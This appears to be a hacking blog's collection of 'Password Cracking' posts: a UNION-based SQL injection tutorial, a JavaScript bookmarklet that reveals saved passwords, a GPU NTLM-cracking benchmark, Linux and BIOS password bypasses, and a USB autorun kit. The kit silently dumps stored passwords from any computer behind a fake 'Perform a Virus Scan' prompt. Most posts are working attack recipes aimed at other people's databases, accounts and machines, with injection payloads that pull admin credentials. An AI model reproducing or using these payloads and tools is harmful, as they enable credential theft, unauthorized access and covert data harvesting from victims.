Showing posts with label Password Cracking. Show all posts

Mar 21, 2013

SQL injection

SQL injection
It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).

1.SQL Injection (classic or error based or whatever you call it) :D

2.Blind SQL Injection (the harder part)

So let's start with some action :D

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

easily get password....enjoy ../*

Jul 9, 2011

How to reveal password behind asterisks<******>

Today in this short tutorial i m gonna tell you a way, a java script using which you can know password behind asterisks/ stars on web pages.

javascript:(function(){var s,F,j,f,i; s = “”; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == “password”) s += f[i].value + “\n”; } } if (s) alert(“Passwords in forms on this page:\n\n” + s); else alert(“There are no passwords in forms on this page.”);})();

How to use this Code:
1. Just open any web browser, and open any website for which username and passwords are stored already on the computer you are using.
lets say www.gmail.com

2. Now if any username and password are stored on ur system for gmail, then it will be visible in login area, as username and ***** stars in place of password.

3. Now if you want to see the hidden password behind these stars, then just copy the given javacode above and replace it with url of gmail in addressbar of ur browser. and press enter.

4. As you follow the 3rd step, the passwords will show you in a alert box

Jun 16, 2011

GPU Password Cracking

GPGPU computing is getting lots of attention these days. GPGPU computing simply means doing general calculations on graphic cards (GPUs) rather than CPUs. Traditionally, GPUs were used only for getting graphical output, rendering frames in games and other purposes related to graphics. Lately, people started realizing that GPUs are far more efficient at handling highly parallel tasks and that there should be a way to code graphic cards. Though GPGPU computing is still at its infancy, a lot of progress has been made toward this direction. For example GPUs are used to speed up video conversion, video processing, doing scientific calculations, folding and password hash cracking.

GPU Password Cracking – Bruteforceing a Windows Password Using a Graphic Card

The last one – password cracking looks very interesting and we are going to discuss about just that. Recently I came across a free password hash cracker called ighashgpu. This tool is developed by a guy called Ivan Golubev. It’s a command-line utility meaning, there is no GUI. Though allergic to command-line utilities, curiosity made me to meddle with the tool to see how fast my Radeon 5770 would crack passwords and the results are simply amazing.

The tool supports these hashes;

Plain MD4, MD5, SHA1.
NTLM
Domain Cached Credentials
Oracle 11g
MySQL5
MSSQL
vBulletin
Invision Power Board
and more …

Cracking an NTLM Password Hash with a GPU

I’m going to use the NTLM hash here. If you are wondering what NTLM is, your Windows (NT and above) logon passwords are not stored as plain text but encrypted as LM and NTLM hashes. They are not reversible and hence supposed to be secure. LM hashes can easily be broken using Rainbow Tables but NTLM hashes are relatively stronger. But that’s not stopping us from cracking them.

For comparison, I’m going to use another popular and free security tool – Cain & Abel. This is an excellent tool for breaking different passwords, using the CPU.

To crack a password, you need to have the NTLM hash of that password. Fortunately, Cain & Abel has a hash calculator. So let’s do some password cracking.

A password with 5 characters

Using Cain, I generate a random password “fjR8n” whose NTLM hash is “AA8251D1BB587ABFAE6403194216041F” without quotes of course.

Now that the password has upper, lower case letters and a number. So the character set should be like this in Cain to crack the password.

As you see, Cain has taken about 24 seconds to crack the password at the rate of 9.8 million passwords/sec.

Let’s see what ighashgpu has to offer.

The password is found in less than one second. Secondly look at how many passwords the GPU has churned out per second. Dude, it’s 3.334 billion passwords.

A password with 6 characters

Let’s now take “pYDbL6” as the 6 character password. The NTLM hash for that password is CB898E9CA230D14413756875DD8BF71D.

Now that Cain reports it would take approximately 1 hour and 30 minutes to crack our password. Note that this is the maximum time Cain would take to crack the password. It could even be less than that, depending on the password.

What about ighashgpu?

Ighashgpu finds the password in staggering 4 seconds. Also note that the maximum time it would take to crack a 6 character alphanumeric password is about 17 seconds. See the difference between GPU and CPU computing?

A 7 character password

Let’s take “fh0GH5h” as the 7 character password whose NTLM hash is 29152D8B2EB5806302EB5829635309E6.

Cain would take about 4 days to crack the 7 character alphanumeric password.

But ighashgpu would take about just 17 minutes and 30 seconds maximum to crack the password hash. Also note that the password is already found in 2 minutes and 15 seconds. This means, my GPU would only take 17 minutes and 30 seconds max to crack ANY 7 character alphanumeric password.

An 8 character password

Let’s make things more interesting now. I take “t6Hnf9fL” as the 8 character alphanumeric password whose NT hash is 7B0E126699A3EE5F0108D07926448E47

Aargh, Cain would take almost one year to crack that password.

What about ighashgpu?

Isn’t it astonishing? Ighashgpu can crack this hash in 18 hours and 30 minutes.

Okay, let’s give some challenge to my GPU.

A 9 character password

Our candidate here is “kfU64FdB8” – 75A7AF26871E71BCF853509C47DB3475

Err, you have to wait for more than 43 years before you find the password if you use Cain.

Let’s move on to ighashgpu.

Isn’t 48 days better than 43 years?

Okay guys, we just saw that a Radeon 5770 GPU would take 48 days to break a 9 character password. My tests also revealed that a 5770 would take 8 years and 70 days to break a 10 character alphanumeric password. Now it’s time to add special characters to the mix.

First thing first. Our 7 character mixed symbols password and it’s hash “F6&B ls” (note the space) – B438599AC14AB16E2F889A4471F7C76F

Cain will take 75 days.

Ighashgpu wouldn’t even take 7 hours to finish the job.

What about an 8 character password?

While Cain would take more than 19 years, ighashgpu can crack the password within 26 days. Far better.

Okay guys, we have just seen what ighashgpu can do for us. It’s fast, really fast indeed for password cracking, since it uses GPU. It can crack any simple and short password and even a simple 10 character password within acceptable time limits. With GPUs becoming more and more powerful, things are only going to get worse. So what length is safe? Can we say a 12 character password is safer? Maybe, but chances are there that we may choose mixture of common words (like names and numbers) as long passwords which may be easily broken with a simple dictionary attack.

If your password contains just numbers, even if it’s 10 characters in length, it can easily be broken with ighashgpu. Let’s take a random 10 character numeric password – “8457317452” whose NT hash is 1089F7DE94ABEE2F38BFBA428C782905.

Look at the image. It’s horrible to know that this password is broken in less than two seconds!

Now I’m running out of patience to know how long my GPU would take to crack mixed (all symbols found on an US English keyboard) 8 character password.

Password: g&4K 3gI

Hash: 02944DC7857DFDDDE7DE6FDF38E9CC95

Just a little more than 25 days.

What about a 9 char password?

Password: H<k7$6fVJ

Hash: 4F5BBAB78A3551E369E205A3022920E9

Now it’s almost 7 years.

Got the drift? The more complex the password is, the longer the GPU will take to crack the password. So when you choose a password, make sure you don’t choose common words and names and always mix your password with letters, numbers and symbols.

We have just witnessed the power of a GPU against a CPU. GPUs are really fast and highly parallel. My Radeon 5770 is not the fastest card around but packs way more punch than a traditional CPU. It also looks like Radeon cards are faster than their Nvidia counterparts especially when it comes to password brute forcing and the latest Radeon 6990 graphic card should be several times faster than my Radeon 5770 and should make ANY 8 character password obsolete.

Dec 21, 2010

Linux Password Hacking

If you’ve ever got stuck on the Login screen of your Linux system, as you don’t know the System password, don’t worry now. Its very easy to crack the password in Linux system.
All it takes is adjusting the boot parameters slightly and typing a command or two. Just follow the below given commands, and the work would be done.

Reboot your computer, and then as soon as you see the GRUB Loading screen, make sure to hit the ESC key so that you can get to the menu.
Now you have two options:

Root Shell Method

If you have the option, you can choose the “recovery mode” item on the menu, usually found right below your default kernel option.
Then choose “Drop to root shell prompt” from this menu (This is called the Single User Mode).
This should give you a root shell prompt.

Alternate Root Shell Method
If you don’t have the recovery mode option, this is the alternate way to manually edit the grub options to allow for a root shell.

First you’ll have to make sure to choose the regular boot kernel that you use (typically just the default one), and then use the “e” key to choose to edit that boot option.
Now just hit the down arrow key over to the “kernel” option, and then use the “e” key to switch to edit mode for the kernel option.
Now in the next screen that you see, you have to remove the “ro quiet splash” part with the backspace key, and then add this onto the end:
rw init=/bin/bash
(On some versions of Linux, you might have other shells as the default shell. So you have to type the above line accordingly. But most Linux versions have the “bash” shell as the default shell.)
Once you hit enter after adjusting the kernel line, you’ll need to use the B key to choose to boot with that option.
At this point the system should boot up very quickly to a command prompt.

You are now at the Root Shell Prompt (also called the Single User Mode)
Now Reset the Password

Once you are the Root Shell Prompt, by following any of the above given method, you can use following command to reset the password of any user account:
passwd username
After the command is successful, type the following command to make sure the changes are written to the hard disk, before you reboot the computer:
sync
Now reboot the computer using the command:
reboot -f

Once the computer restarts, you shall be able to login from the account, for which you had changed the password.

Cracking Linux Password when Grub cannot be changed

In the previous post we learnt about cracking Linux Password using the Grub – Dropping to Single User Mode.
However, if the Grub is password protected, then this method will not work. So in such cases, we can use the Linux Live CD to crack the Linux Password. Follow the below given steps to change the Linux Password, using the Linux Live CD.

Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot menu.
Once the system boots open up a new Terminal window and then type in the following command:
sudo fdisk –l
This command is used to tell what device name the hard drive is using, which in most cases should be /dev/sda1, but could be different on your system.
Now you’ll need to create a directory to mount the hard drive on. Since we’re actually booting off the live cd, the directory doesn’t really get created anywhere.
sudo mkdir /media/sda1
The next command will mount the hard drive in the /media/sda1 folder.
sudo mount /dev/sda1 /media/sda1
Now it’s time for the command that actually does the magic:
chroot.
This command is used to open up a shell with a different root directory than the current shell is using, and we’ll pass in the folder where we mounted the hard drive.
sudo chroot /media/sda1
Now you should be able to use the passwd command to change your user account’s password, and it will be applied to the hard drive since we are using chroot.
passwd <username>
Now you should be able to reboot your system and log yourself in with your new password.

Hope you find this post useful, as many students have asked about cracking Linux Password.
More posts would be coming in the future about Linux.

Dec 16, 2010

Password Hacking Using USB

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Dec 12, 2010

Crack Bios Password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.

Follow the steps below:

[eminimall]

1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine

password protection gone!!!!!!!!!!!!!

EnjoYYYYYYYYYY

PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data……….

The use of this code is entirely at ur risk……….

It worked fine for me……….

Pages